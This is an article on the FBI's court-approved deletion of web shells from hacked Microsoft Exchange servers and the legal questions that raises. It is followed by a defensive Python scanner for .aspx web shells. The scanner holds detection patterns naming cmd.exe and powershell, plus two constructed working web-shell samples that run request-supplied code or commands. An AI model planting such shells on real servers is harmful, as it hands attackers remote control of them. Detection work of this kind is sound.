Cybersecurity – What are the Boundaries of Active Defense? 

The US has been practicing active defense against hackers. As part of a government effort to contain the continuing attacks on corporate networks running Microsoft Exchange software, the FBI now has the authority to access privately owned computers without their owners’ knowledge or consent, and to delete software from them. This unprecedented intrusion is raising legal questions about just how far the government can go.

The software the FBI is deleting is malicious code installed by hackers to take control of a victim’s computer. Hackers have used the code to access vast amounts of private email messages and to launch ransomware attacks. 

On April 9, the United States District Court for the Southern District of Texas approved a search warrant allowing the U.S. Department of Justice to carry out the operation.

The authority the Justice Department relied on and the way the FBI carried out the operation set important precedents. They also raise questions about the power of courts to regulate cybersecurity without the consent of the owners of the targeted computers, according to homelandsecuritynewswire.com.

Public-private cooperation is critical for managing the wide range of cyber threats facing the U.S. But it poses challenges, including determining how far the government can go in the name of national security. It’s also important for Congress and the courts to oversee this balancing act.

Since at least January 2021, hacking groups have been using zero-day exploits – exploits for previously unknown vulnerabilities – in Microsoft Exchange to access email accounts. The hackers used this access to insert web shells, server-side scripts that allow them to remotely control the compromised systems and networks. Tens of thousands of email users and organizations have been affected. One result has been a series of ransomware attacks, which encrypt victims’ files and hold the keys to decrypt them for ransom.
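As an added illustration (not part of the original article, and not the FBI's own tooling), the following Python script shows the generic kind of check a server administrator could run to find web shells of this class: a heuristic scan of .aspx pages for server-side code that hands a request parameter to eval() or spawns a child process. The indicator patterns, the directory names and the three sample files are constructed for the example and are not indicators taken from the Exchange investigation.

```python
"""Heuristic scan of ASP.NET (.aspx) files for web-shell indicators.

Added example: generic heuristics for one-file web shells that pass
attacker-supplied request data to eval() or to a child process. The
patterns below are illustrative, not indicators from any investigation.
"""
import re
import tempfile
from pathlib import Path

# Each indicator: (name, compiled pattern). Hits are reported in this order.
INDICATORS = [
    # Server-side eval over a request parameter: the defining shape of a
    # one-line script-language web shell.
    ("eval_request", re.compile(r"\beval\s*\(\s*Request\b", re.I)),
    # Page code that spawns a process on the server.
    ("process_exec", re.compile(r"System\.Diagnostics\.Process|\bProcess\.Start\s*\(", re.I)),
    # Direct reference to a command interpreter (weak evidence on its own).
    ("shell_binary", re.compile(r"\bcmd\.exe\b|\bpowershell(\.exe)?\b", re.I)),
]

# Indicators strong enough to flag a file by themselves.
STRONG = {"eval_request", "process_exec"}


def scan_source(text: str) -> list[str]:
    """Return the names of the indicators present in one page's source."""
    return [name for name, pat in INDICATORS if pat.search(text)]


def is_suspicious(hits: list[str]) -> bool:
    """A file is flagged only when a strong indicator fires."""
    return any(h in STRONG for h in hits)


def scan_directory(root: Path) -> dict[str, list[str]]:
    """Scan every *.aspx under root; return {relative path: hits} for flagged files."""
    flagged: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.aspx")):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        hits = scan_source(text)
        if is_suspicious(hits):
            flagged[path.relative_to(root).as_posix()] = hits
    return flagged


# Constructed sample pages (not captured from any real server).
SAMPLE_SHELL = '<%@ Page Language="Jscript"%><%eval(Request.Item["c"],"unsafe");%>'
SAMPLE_CSHARP_SHELL = (
    '<%@ Page Language="C#" %><% var p = new System.Diagnostics.Process();'
    ' p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c " + Request["c"];'
    " p.Start(); %>"
)
SAMPLE_BENIGN = (
    '<%@ Page Language="C#" %>\n<html><body>'
    '<asp:Label runat="server" Text="Mailbox quota" /></body></html>'
)


def demo() -> dict[str, list[str]]:
    """Write the constructed samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for sub, name, body in (
            ("site1", "error.aspx", SAMPLE_SHELL),
            ("site2", "index.aspx", SAMPLE_BENIGN),
            ("site3", "upload.aspx", SAMPLE_CSHARP_SHELL),
        ):
            (root / sub).mkdir()
            (root / sub / name).write_text(body)
        return scan_directory(root)


if __name__ == "__main__":
    for rel_path, hits in demo().items():
        print(f"{rel_path}: {', '.join(hits)}")
```

Point scan_directory at a real web root to use it outside the demo. Keep the false-positive rate in mind: legitimate administration pages may legitimately reference a process class, so treat a hit as a lead to triage (file timestamps, ownership, whether the page is part of the installed product) rather than as proof of compromise.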